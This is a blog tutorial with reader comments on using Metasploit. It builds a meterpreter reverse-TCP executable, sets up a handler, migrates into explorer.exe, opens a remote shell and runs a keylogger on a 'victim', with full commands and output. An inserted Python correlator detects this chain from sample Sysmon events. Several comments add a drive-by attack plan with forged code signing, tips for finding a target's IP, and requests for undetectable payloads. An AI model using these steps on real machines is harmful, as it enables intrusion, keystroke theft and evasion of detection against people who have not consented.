--- The Metasploit Framework ---


Note: This is an advanced topic. Read carefully. Feel free to ask any kind of queries; we are always here to help you.

If you are really interested in network security, chances are you have heard of Metasploit over the last few years.
Now, have you ever wondered what someone can do to your PC just by knowing your IP? Here's the answer. He could 0wN you, or in other words, he could have full access to your PC, provided you have just a few security loopholes, which may arise for even a simple reason like not updating your Flash Player last week when it prompted you to.
Metasploit is a hacker's best friend, mainly because it makes the job of exploitation and post-exploitation a lot easier compared to other traditional methods of hacking.
The topic of Metasploit is very vast in itself. However, I'll try to keep it basic and simple so that everyone here can understand it. Also, Metasploit can be used with several other tools such as Nmap or Nessus (all of these tools are present in Backtrack).
In this tutorial, I'll be teaching you how to exploit a system using a meterpreter payload and start a keylogger on the victim's machine.

Hacking through Metasploit is done in 3 simple steps: Point, Click, 0wn.

Before I go into the details of The Metasploit Framework, let me give you a little idea of some basic terms (they may seem boring at first, but you should know them):

Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited, resulting in notable damage.
Exploit: A piece of software that takes advantage of a bug or vulnerability, leading to privilege escalation or DoS attacks on the target.
Overflow: An error caused when a program tries to store data beyond the size of the space reserved for it. May be used by an attacker to execute malicious code.
Payload: The actual code which runs on the compromised system after exploitation.
Now, what IS Metasploit?
It is an open source penetration testing framework, used for developing and executing attacks against target systems. It has a huge database of exploits, and it can also be used to write your own 0-day exploits.



METASPLOIT ANTI FORENSICS:
Metasploit has a great collection of anti-forensics tools, making forensic analysis of the compromised computer a little more difficult. They are released as part of MAFIA (Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer and Transmogrify.
Metasploit comes in the following versions:
1. CLI (Command Line Interface)
2. Web Interface
3. MSF Console
4. MSFwx
5. MSFAPI
I would recommend using the MSF Console because it is the most effective and powerful option from a pentester's P0V. Another advantage of this mode is that several sessions of msfconsole can be run simultaneously.
I would recommend doing the following things in Metasploit on Backtrack (system or image), avoiding the Windows version of the tool.
For those who don't know, Backtrack is a Linux distro made especially for security personnel, including all the tools required by a pentester.
Download Backtrack from here. You can download the ISO or the VMware image, according to the one you're comfortable with. If you have physical access to more than one system, then go for the ISO image and install it on your hard disk.
Let the Hacking Begin :
Open up backtrack. You should have a screen similar to this.

The default login credentials are:
Username: root
Pass: toor
Type in
root@bt:~#/etc/init.d/wicd start
to start the wicd manager
Finally, type "startx" to start the GUI mode:
root@bt:~#startx

First of all, know your local IP. Open up a konsole (on the bottom left of the taskbar) and type in:
root@bt:~#ifconfig
It would be something like 192.168.x.x or 10.x.x.x.
Have a note of it.
Now,
Launch msfconsole by going to Applications>>Backtrack>>Metasploit Engineering Framework>>Framework Version 3>>msfconsole

You should now have a shell, something similar to a command prompt in Windows.
msf >
Let's now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.
Open another shell window ("Session>>New Shell", or click on the small icon on the left of the shell tab in the bottom left corner of the window):

root@bt:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST="your local ip" LPORT="any port you wish" x > /root/reverse_tcp.exe
Your local IP is the one you noted earlier, and for the port you could select 4444.
(Everything has to be entered without the quotes.)
You should get something like this:
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=192.168.255.130,LPORT=4444
root@bt:/opt/metasploit3/msf3#
Also, on your Backtrack desktop you should now see a reverse_tcp.exe file.

Copy it to your other computer on the same local network using a thumb drive or by uploading it online.


Now open the 1st shell window with msfconsole in it.
msf >
Type the following:
msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.255.130
LHOST => 192.168.255.130
msf exploit(handler) > set LPORT 4444
LPORT => 4444

All the configuration is done. You have already made an executable file which makes a reverse connection to you,
and now you have set up the handler to listen for the meterpreter connection on port 4444.
The last step is to type in "exploit" and press enter:
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.255.130:4444
[*] Starting the payload handler...
Now, the handler is listening for all incoming connections on port 4444.
[*] Sending stage (749056 bytes) to 192.168.255.1
[*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011

You would see a meterpreter prompt like this:
meterpreter >
Type in ps to list the active processes:
meterpreter > ps

Search for explorer.exe and migrate to that process (5716 is the PID it had in this example; use the one shown in your ps output):
meterpreter > migrate 5716
[*] Migrating to 5716...
[*] Migration completed successfully.
meterpreter >

Type in the following:
meterpreter > use priv
Now, if you want to start the keylogger on the victim, just type keyscan_start at the meterpreter prompt.

Now, if you want to get a command prompt on the victim's computer,
just type shell:
meterpreter > shell
Process 5428 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

You would now have a command prompt.
Type in whoami to see the victim's computer name and user:
C:\Windows\system32>whoami
whoami
win7-pc\win 7
C:\Windows\system32>

Let’s suppose you want to start a notepad on the victim’s computer.
Type in:
Let's say the victim has typed something on his computer since you started the keylogger.
Just type exit to return to meterpreter.
Now type in keyscan_dump to see all the captured keystrokes:
meterpreter > keyscan_dump
Dumping captured keystrokes...

GaM3 0V3R
P.S.: The above information is just for educational purposes only. You should test it against the computer you own.
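On the defensive side, the chain above leaves a recognisable footprint in host telemetry: an executable launched from an unusual path, an outbound connection to a port like 4444, and a remote thread created in explorer.exe (which is what migrate does). The following correlator is an added example, not code from the article; the Sysmon-style events it reads are constructed by hand, and the "trusted path" and "expected port" lists are assumptions to tune for a real environment.

```python
from collections import defaultdict

# Sysmon event IDs used below (real Sysmon numbering).
PROCESS_CREATE, NETWORK_CONNECT, CREATE_REMOTE_THREAD = 1, 3, 8

# Assumed baseline: ports a workstation normally talks to, and the
# directories its legitimate software is launched from.
EXPECTED_PORTS = {53, 80, 443, 445, 3389}
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files")

# Constructed sample telemetry (not captured from a real host). The first three
# events mirror the tutorial: reverse_tcp.exe run from a thumb drive, its
# callback to the handler on 4444, then `migrate` into explorer.exe.
EVENTS = [
    {"id": 1, "pid": 5428, "image": r"E:\reverse_tcp.exe"},
    {"id": 3, "pid": 5428, "image": r"E:\reverse_tcp.exe",
     "dst": "192.168.255.130", "port": 4444},
    {"id": 8, "pid": 5428, "image": r"E:\reverse_tcp.exe",
     "target_pid": 5716, "target": r"C:\Windows\explorer.exe"},
    # Benign noise: a browser started from Program Files talking HTTPS.
    {"id": 1, "pid": 900, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe"},
    {"id": 3, "pid": 900, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dst": "93.184.216.34", "port": 443},
]


def analyse(events):
    """Return {pid: [reasons]} for every process showing at least two of the
    three behaviours; any one of them alone is too noisy to alert on."""
    reasons = defaultdict(list)
    for ev in events:
        pid, image = ev["pid"], ev["image"].lower()
        if ev["id"] == PROCESS_CREATE and not image.startswith(TRUSTED_DIRS):
            reasons[pid].append(f"launched from untrusted path {ev['image']}")
        elif ev["id"] == NETWORK_CONNECT and ev["port"] not in EXPECTED_PORTS:
            reasons[pid].append(f"outbound to {ev['dst']}:{ev['port']} (unusual port)")
        elif ev["id"] == CREATE_REMOTE_THREAD:
            reasons[pid].append(f"remote thread into {ev['target']} (pid {ev['target_pid']})")
    return {pid: why for pid, why in reasons.items() if len(why) >= 2}


if __name__ == "__main__":
    for pid, why in analyse(EVENTS).items():
        print(f"ALERT pid {pid}:")
        for line in why:
            print("  -", line)
```

In the sample data only pid 5428 is reported, with all three reasons; the browser's single HTTPS connection from a trusted path produces nothing.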



About the Author: This is a guest article written by Mr. Aditya Gupta. He is a Cyber Security Expert and C|EH Certified Ethical Hacker. His main areas of expertise include online privacy issues, web application security and wireless hacking. You can connect with him on Facebook here.








63 comments:

  1. this looks complicated but interesting...:)

  2. nice one!

  3. Nice Post Bro Keep It Up...!!

  4. what do u mean by the 2 versions vmware and ISO?
    m running kubuntu 10.10..can i install it?
    which would u suggest?

  5. I was beating around this topic for weeks. this was very very helpful thanks yar. keep on posting!

  6. hey u have kept on telling what to do but how much time will it need for newbie to be able to start exploiting himself?

  7. Thanks everybody.

    @qwerty
    VMware is virtualization software. You can run multiple operating systems on the same machine. You don't need dual booting. You can use Backtrack on your current operating system using the Backtrack VMware image.

    The ISO image is meant to be burned on a disk so you can install it. Use this if you don't want to run Backtrack on your current OS.

    @Saiprasad

    You need to explore a lot. It requires a lot of time..

  8. Hmm, seems good. Will be trying it out soon, rather helpful. Also Aneesh, do you visit public/private hacking forums? Such as hackforums.net.

  9. Yeah, Sometimes

  10. Thanks for awesome tutorial.. I have some questions though.. Does it work over the Internet too? If yes then how am I gonna get the IP Address of target system?

  11. Yes, it would work over the Internet too.

    To get the IP, one thing you can do is to use an IP logger PHP script, host it on a free webhost, and ask the user to visit that link. It may sound a little complicated, but trust me, it's really simple.

    Good Luck!

  12. Could you please share the link to some good tutorials for mastering BT? Videos or E-books? Thanks!

  13. i have question so i can pay for this too !

    esa_65@hotmail.fi here is my msn

  14. The metasploit unleashed is a good place for a newbie to start.
    Here's the link

  15. nice post bro.. keep it up.. but i want to know, is there any change in the commands for backtrack 5????

  16. This one is done in a vm , but how to carry out this in real world situation,
    should i first port forward or dmz my vm (bt ) machine then use my local ip or my external ip . could u please share some light on this

    doing this in real world situation

  17. Metasploit seems insanely complicated, thanks for making it that little bit clearer! This can be applied to servers, it's insane how insecure things are!

  18. Friends feel free to copy the articles by asking the admin, as these articles have also been taken from various other websites. . .

  19. How can i copy the .exe file in2 a thumb drive in BT4...???

  20. Great Job Bro

  21. am using metasploit 3.7 version n this procedure is not working out :(
    what do i do ??

  22. hi frndz
    help me plz
    its all going well & i got a session also but some problem like
    [*] Started reverse handler on 192.168.255.130:4444
    [*] Starting the payload handler...
    Now, the payload is listening for all the incoming connections on port 444.
    [*] Sending stage (749056 bytes) to 192.168.255.1
    [*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011

    dats it... its not going more,,,
    when i type session -l its show command not found...

    plz helppppp

  23. Great job ! Bdw, backtrack is complex thing - why u didn't write installation procedure ? dual boot ? windows 7 ? USB backtrack usage ?Ubuntu ? kindly, tell me about it !!!!!

    Thanks in advance
    sami

  24. anyone want to learn hacking or how to use metaspolit command in unix. mail me or can chat with me at abhishek.jalan84@gmail.com

  25. Is this above all possible to do in windows? I am downloading the windows version but is it possible to work the same way on it?

  26. Nice Informative Post!!

    Bloggers needed for Hacking Exposed [almashackingtutorials.blogspot.com]
    If interested mail me at almas.malik101@gmail.com

  27. well. i am kinda new to metasploit. I can understand most of it but
    i have a question.
    why do we have to copy the payload file? Can't we inject it into the target?

  28. nice articles,

    keep it up bro

  29. Very Nice Article :
    Can you Post some windows 7 ultimate , basic version exploit ...
    xD
    thanks ..

  30. Will this method works on public network ?

  31. nice one, but explain in backtrack 5

  32. you all are fools except two, one me and the second one is the owner of this web page !!

  33. excellent article..
    very kewl,, Its truly appreciated

  34. i av bt5 live cd, buh im finding it difficult to configure my hsdpa modem with it.
    i also have ubuntu 10.6 dual boot with windows, ive successfully configured my modem with it ubuntu.
    how can i copy the exploiting softwares from the bt5 livecd to the ubuntu os,
    Ill really appreciate ur gud response.

  35. I get an error: metasploit 3 directory doesn't exist. I have the latest backtrack i think. seems fun. maybe i'll look more into this later.. I r confused.

  36. it's all about your hardwork and some knowledge, if you try to get in someone's pc, it takes 100 try and only one you might get success...in short..lots of...A LOT...work required. Do you understand now?, in short, 99 % chances are of only failure.

  37. it's all about your hardwork and some knowledge, if you try to get in someone's pc, it takes 100 try and only one you might get success...in short..lots of...A LOT...work required. Do you understand now?, in short, 99 % chances are of only failure.

  38. This won't work for real, are people really this stupid? First off, you have to manually infect a machine. Second, you have to connect to it, it doesn't connect to you.

    99% of the time the machines on the net are behind firewalls which means requirement one is out!

    99% of the time the machines on the net are behind firewalls which means requirement two is out!

    This isn't hacking, if you actually do this at work or on a private network, you WILL GET CAUGHT. This example is a glorified version of VNC with a hidden tasktray icon. I wrote a self installing VNC ver, with no tray or installer, it self installed w a preset pass.

    If you want to know what a real world example of something like this would be, I'll tell you.
    1) Crack any public web server
    2) Build the exact reverse of this example with Meta, so that the exe connects to you when run, then take an MD5 signed piece of trusted code, find the collisions to the hash and copy the cert to your app. Your app also needs to be an ActiveX control, or if you're not that good, make it a ClickOnce...
    3) Get a VPS anonymously and setup the listener, setup a bunch and make sure they are all on different ports, or better yet, proxy the inbound connections.
    4) put the Signed ActiveX/ClickOnce control on the site so it auto-installs when a browser goes there.
    5) Sit on your VPS, or a hacked one, and wait...

    That's a real world example which will actually work in the real world no problem. One tip, when searching for valid signed exe's, look at the older apps... new ones are sha1.. That's right, I just told the whole world how to bypass MS security right now, and any time for the next few years no problem, there isn't a knowledgebase in the world that'll include a CRL for their ROOT CA's... No way at all. Windoz Suckz.
    3dge3lite

  39. can bactrack use to get computer information from ISP server, if we have ip public of ISP ? thanks for help, freehotspot2340@yahoo.co.id

  40. very nice tutorial, and clearly intended for pen testing purposes as well.
    People who want to know what a real hack looks like, try looking at card tricks, it's a bit of show and a good trick usually. But if you know how it works it's usually just a few simple steps and a show that fits the situation. Hacking is usually a bit like this: one, most of the time seemingly harmless, entry point gives an opportunity to hack the rest of the system. What you need to know if you want to understand how these hacks work is everything about the software used, and where the vulnerabilities are most likely to be found. The hack is done by the hacker, not by the tools!

  41. I cannot migrate to the winlogon.exe process. It says:

    Error running command migrate: Rex::RuntimeError Cannot migrate into this process (insuficient privileges)

    How can I get around that? The machine I'm attacking is running windows 7 (in fact, I'm typing from it as we speak and keyscan is capturing all the keystrokes).

  42. are surfing with proxy websites and IP spoofing the same technique?
    if not, why are proxy websites constructed?
    if any hacker uses a proxy website for cyber crime, will he/she not be traced ??????
    hope that you'll reply to me !!!!

  43. is there any difference b/w these 2 prompts in BT:
    root@bt: and root@root:

    when I work in root@bt: all konsole functions work, but in root@root: it doesn't work.. I couldn't even find the metasploit framework in root@root:...
    how to fix this problem ???? plz help me.

  44. Ok now author, I'm using windows7 on my laptop and I heard that there is some dual OS or something like that. is it possible for me to have both Linux and Windows on the same laptop? if this is possible, how can I go about doing it? Please mail me at: mymcsi.mymcsiworld@gmail.com

  45. This isn't exploiting a vulnerability.

  46. such a nice post...

    gr8 :))

  47. Thanks for the great post, keeps me going and giving me more stuff to play with.

    Here's my tutorial on the most basic metasploit use i could do. it's not up to your quality but it's a start

    http://4stripe.wordpress.com/2012/05/30/your-first-and-easiest-metasploit-exploit-of-a-windows-xp-box-how-to-with-screenshots/

  48. pls send me a fud crypter pls pls

    shanks.goel@gmail.com

  49. you made my day, for any newbee, craving to learn, this is the right place

  50. We have to install metasploit in backtrack or our operating system.

  51. hi

  52. I like this post , can you show the last video about data base version 4.4
    you ar pro >>>> ^_^

  53. its not enough its just the basic of metasploit there is lots of work u can do with it

  54. dude can u post a video on how to use it...

  55. bro can u post a video on this please....

  56. Dual boot is pretty easy. With windows, Defrag your drive first then resize your windows partition with gparted or any other partitioning software. Then reboot with linux disk and run installation, make sure you select the empty space and not your windows partition....done

  57. wow fantastic?

  58. am still hustling with the installation of bt, let me hope for success

  59. Does Metasploit, Backtrack protect your identity or do you need to go thru a VPN? I've heard one or the other has its own VPN? Would you ever hack from your home or do you go elsewhere?

  60. Really awesome and very beautifully explained by you
    i like it a lot because this is the first time i see this type of fully explained hacking.....

  61. thanks so much but the basic info will be appreciated so as to have full knowledge

  62. I have few question..

    this is good when we have physical access to the victim computer, as we are transferring the Payload directly. And if we have physical access then there are RATs, viruses, keyloggers which can help us.

    my question is how to send them via mail.. coz it will pop up as a virus.. how to make it stealthy or undetectable

  63. A few minutes ago my friend accessed my laptop through metasploit, and my problem is: can he access it whenever he wants to, or can he access it only once?
